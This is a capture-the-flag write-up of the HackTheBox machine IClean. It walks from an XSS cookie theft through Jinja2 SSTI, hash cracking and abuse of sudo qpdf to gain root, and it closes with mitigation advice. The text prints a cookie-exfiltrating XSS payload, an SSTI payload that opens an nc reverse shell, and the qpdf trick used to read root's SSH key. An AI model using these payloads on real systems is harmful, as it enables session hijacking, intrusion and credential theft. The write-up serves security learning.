

Box on HackTheBox

IClean is a medium-rated Linux box created by LazyTitan33. Pwning this box requires a series of custom exploits, offering an excellent learning opportunity. Here's a brief overview of the steps involved:

  • Foothold: For the foothold we are supposed to exploit an XSS (Cross-Site Scripting) vulnerability and an SSTI (Server-Side Template Injection) vulnerability.
  • User: For the user access we will need to access some SQL databases and then crack a hash.
  • Root: For root access we will be exploiting some sudo privileges given to the user.

Get ready to dive into each stage, where we'll go through all the tricks and tools you need to own this box.


Let's start with an nmap scan.

Nmap Scan.

Here we see two open ports:

  • 22: For SSH
  • 80: For HTTP

Lets checkout the website hosted:

Webpage Home.

Here we see some cleaning service website also from the Wappalyzer's output we can tell that this is a flask app. Let's also do a directory fuzz:

Directory FUZZ.

Here we see a few endpoints but after further enumeration we only have interest in a couple:

  • /login
  • /quote
  • /dashboard

For the /login endpoint we get a login page which doesn't seem to be vulnerable to any injection.

When we try to access the /dashboard endpoint we just get redirected to the home page, looks like we need to be logged in to be able to access that.

Last when we try to access the /quote endpoint we get a form where we can request a quote for different services:

Webpage Quote.

On a normal input we just get a Thank You page where we are informed that the quote request was submitted.


Now, if you think about the way this box is designed, if a quote is submitted someone must be also viewing the quote somewhere, what if we poison the quote data with some XSS payload, if it works we might be able to steal their cookie, let's pass the request through burp and try to poison the data.

Initial Request.

Here is the initial request made to the server for submitting a quote. Let's first try to poison the service field with an XSS payload.

I will setup an HTTP server locally and craft an XSS payload so that the box can send my local server a request with the cookie in it, the payload I will use is this:

XSS Payload
<img src=x onerror="this.src=''+document.cookie">

XSS Attempt.

The payload might not be human readable in the above image as it is URL encoded. On sending this request I should see some hits on my terminal runnning the HTTP server.

XSS Successfull.

As you can see on the terminal, we see some hits to our server with the cookie. Lets try to access the dashboard with this cookie.

Webpage Dashboard.

As you can see we have successfully accessed the Admin Dashboard.

Here too, we see a few endpoints, but one interests us: Generate QR. Once you generate an invoice and have the invoice number, you can generate a QR and a printable invoice for that QR using this endpoint.

Once you generate the QR you get another form to generate a printable invoice. This is the vulnerable field, and it is vulnerable to SSTI (Server-Side Template Injection). One good thing is that we already know that the app is built using flask, so we can directly try the payloads for flask. Lets first try a basic payload for SSTI in jinja2.

Jinja2 SSTI Payload
{{ 7*7 }}

SSTI Attempt.

On sending this payload we should see a reflection with 49 as the output.

SSTI Successfull.

As you can see we get 49 reflected in the webpage, this means we have SSTI. Now SSTI can be used to get code execution, I won't tell the full procedure of payload generation, as it requires a lot of trial and error. I will just show the payload that works.

SSTI Payload for RCE
{{ (dict.mro()[-1]|attr("\x5f\x5fsubclasses\x5f\x5f"))()[365]('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 9001 >/tmp/f',shell=True,stdout=-1).communicate()[0].strip() }}

When we send this payload to the server we get a reverse shell back to our listener.

Code Execution.

We see here that we have successfully got code execution. And the user we are currently logged in as is www-data.

User Access

Now, to escalate to the user, we need to enumerate further. On checking the /home directory we find a user named consuela. If you think about it, there was a login page in the webapp, hence there must be some credentials in the application code or in some database. Lets check out the app code.

Database Config.

On analysing the app.py file, we find this database login creds for the website database. If you login with these creds into the mysql database, you will find a users table with two users, admin and consuela with their password hashes.

Users Table.

If we try to crack the hash for the user consuela we get the user's password.

consuela Password.

I have used CrackStation to crack this hash, if you want you can crack it locally using hashcat or something. Now you can login to the user using this password.

Root Access

Now for root access we will first check the sudo privileges of the user, we can do this using the command: sudo -l

Sudo Privileges.

As you can see the user consuela can run one command as sudo on the box: /usr/bin/qpdf.

On researching a bit, I found that qpdf is a command line PDF utility for manipulating PDF files. So first we might need to dig into its docs to see what all things it can do. Worry not as I have done the hard work for you.

On checking the docs we find an attachment feature in the qpdf utility, it basically allows us to add an attachment to any PDF. The interesting thing is that the attachment can be any file type, and as we can run this in utility as root, theoretically we can read files as root. So lets try to read the private SSH key for root.

  • First we would need to add an attachment to a PDF file (in this case the id_rsa of root). You can get a dummy PDF for this or this utility also has a feature through which it will automatically use a blank PDF as the input PDF.
  • After adding the attachment we can read the attachment from the result PDF using the same utility.

Let's see this in action:

qpdf Priv Esc.

As you can see here, we have successfully got the id_rsa for root user.

  • In the first command we add the attachment to an empty PDF file. The argument --empty tells the utility to use an empty PDF file for the input. After this the result will be stored in the res.PDF file.
  • In the second command we check the attachments of the res.pdf file, the output tells us that there is one attachment named id_rsa.
  • In the third command we extract the attachment and we get the private key for root.

Using this private key you can SSH login into the root user.

Root Access.

As you can see here we have successfully got root access.

Mitigating These Vulnerabilities

Now, lets look at how we can mitigate these vulnerabilities.


To mitigate the foothold vulnerabilities we would need to sanitize user input. In both cases (XSS and SSTI) the user input was not sanitized properly which lead to these vulnerabilities. Though I should mention that flask and jinja2 are built with security in mind and they automatically prevent these vulnerabilities by HTML encoding everything that comes from the server, so I think these vulnerabilities were manually added to showcase these kind of risks. If you want to manually mitigate these vulnerabilities you too can first encode the output you want to show on the website to HTML encoded format.


For the user, we cant do anything about the database passwords, whatever you try the database password will get leaked if an attacker gets code execution on the server. What you can do to mitigate the priv esc is to use complex and long password so they can't be cracked.


For root, you should not give sudo privileges to users, and if it is necessary to give some privileges, you should know everything about the executables that you are giving permissions to, one way to solve this specific issue is that you can create custom scripts with custom inputs for different tasks, and then give sudo permissions to just those scripts.

Tags: | linux | XSS | CookieSteal | SSTI | machine | sudo |